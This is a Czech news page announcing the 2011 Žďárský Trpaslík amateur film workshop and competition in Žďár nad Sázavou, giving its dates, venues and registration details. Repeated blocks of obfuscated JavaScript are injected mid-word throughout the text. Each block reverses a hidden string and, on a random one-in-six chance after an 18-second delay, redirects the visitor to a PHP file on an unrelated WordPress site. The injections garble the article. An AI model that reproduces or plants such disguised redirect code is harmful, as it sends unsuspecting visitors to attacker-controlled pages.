Žďár nad Sázavou, zdar nad sazavou, aktuality, trpaslík, film
Rainbow page separator

Žďárský Trpaslík 2011 – Workshop a soutěž amatérských filmů

Středa, 28. září 2011

Žďár nad Sázavou /Projekt Žďárský Trpaslík 2011 navazuje na desetile[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou tradici soutěže amatérských filmů Žďárský Trpaslík. Le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní, již jedenáctý ročník, nabízí vedle soutěž amatérských filmů také workshop, ve kterém může kdokoli zrealizovat svůj filmový sen.
Projekt pořádá Hifiklub Žďár nad Sázavou za finanční podpory Kraje Vysočina a města Žďáru nad Sázavou.

Workshop natáčení amatérského filmu

Workshop natáčení amatérského filmu se uskuteční 8. – 9. října 2011 vždy od 9:00 v pros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torách ZUŠ Františka Drdly ve Žďáře nad Sázavou.
Cílem workshopu je seznámit účastníky (zejména z okresu Žďár nad Sázavou) se způsobem natáčení filmů v neprofesionálních podmínkách a umožnit jim realizaci vlastních filmových nápadů. Zájemci si projdou dlouhou cestu od prvotního nápadu, přes zpracování námětu do podoby bodového scénáře, až po vlastní realizaci filmu.
Workshop je určen pro max. 20 osob ve věku od 10 let. Účastníci pracují v menších skupinkách. K účasti není potřeba žádná předchozí zkušenost s filmovým médiem. Účast ve workshopu je zdarma, podmínkou účasti je včasná registrace (do 7. října 2011).
Výsledná filmová díla bude můžné shlédnout v neděli 9. října od 16:00 v Café u tety Hany. Hodinová projekce nabídne také zajímavé snímky z pražské přehlídky amatérskách filmů PAF. Vstup na projekci je zdarma.

Soutěž amatérských filmů

Ve dnech 21. – 22. října 2011 se uskuteční 11. ročník soutěže amatérských filmů Žďárský Trpaslík 2011.
Původně byla určena hlavně pro amatérské filmaře z oblasti Vysočiny, kterým podobná akce dlouho chyběla. Během 10 let se působnost soutěže Žďárský Trpaslík rozšířila na celou Českou republiku a Slovensko. Na rozdíl od mnoha jiných podobných soutěží se organizá[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toři a porotci snaží přistupovat k au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torům a jejich dílům s maximální otevřeností, nediskriminovat je pro povrchní technické či řemeslné nedostatky a oceňovat naopak jejich upřímnost a spontánní kreativitu, která je mnohdy činí zajímavými.

Zahájejní soutěže proběhne v pátek 21. října 2011 od 17:30 v Café u tety Hany. Večer je věnován nesoutěžním amatérským filmům. Představeny budou snímky, které uspěly v loňském ročníku soutěže, a dále díla, které vznikla na Letním soustředění mládeže (pořádá Hifiklub Žďár nad Sázavou a DDM Bystřice nad Pernštejnem).
Soutěžní projekce proběhne v sobotu 22. října od 8:30 v klubu Batyskaf. Žďárský Trpaslík je otevřen všem filmovým žánrům a tématům. Setkávají se zde dokumentární filmy s filmy animovanými, filmové experimenty s videoklipy či hrané filmy s reportážemi.

Přehlídka amatérských filmů Žďárský Trpaslík 2011 nabízí divákům v sobotu 22. října 2011 nejen projekce snímků, ale také aktivní zapojení do filmového dění. Pro diváky, kteří mají chuť vytvořit si vlastní krátký film, je určena soutěž Videorallye, jejíž podsta[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou je vytvořit během soutěžního dne krátké dílo na zadané téma, pouze s pomocí kamery a zajímavého nápadu filmaře. Výsledná díla Videorallye jsou prezen[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tována v závěru soutěžního klání.
Závěrečný večer soutěžního festivalu se odehraje od 18:00 v Café u tety Hany za účasti diváků, filmových tvůrců, jejichž snímky byly zařazeny do soutěže, a členů poroty. Večer zahájí nesoutěžní projekce, dále následuje vyhlášení výsledků soutěže Žďárský Trpaslík a debata s poro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou nad soutěžními filmy. Do debaty se mohou se svými postřehy zapojit také diváci přehlídky a spolu s porotci mohou poradit filmovým tvůrcům, jak lépe převádět jejich nápady do světa filmu.

Do soutěže se mohou zájemci přihlásit do 10. října 2011. Vstup na projekce je pro diváky zdarma.

Další informace a přihlášky naleznete na www.zdarskytrpaslik.cz.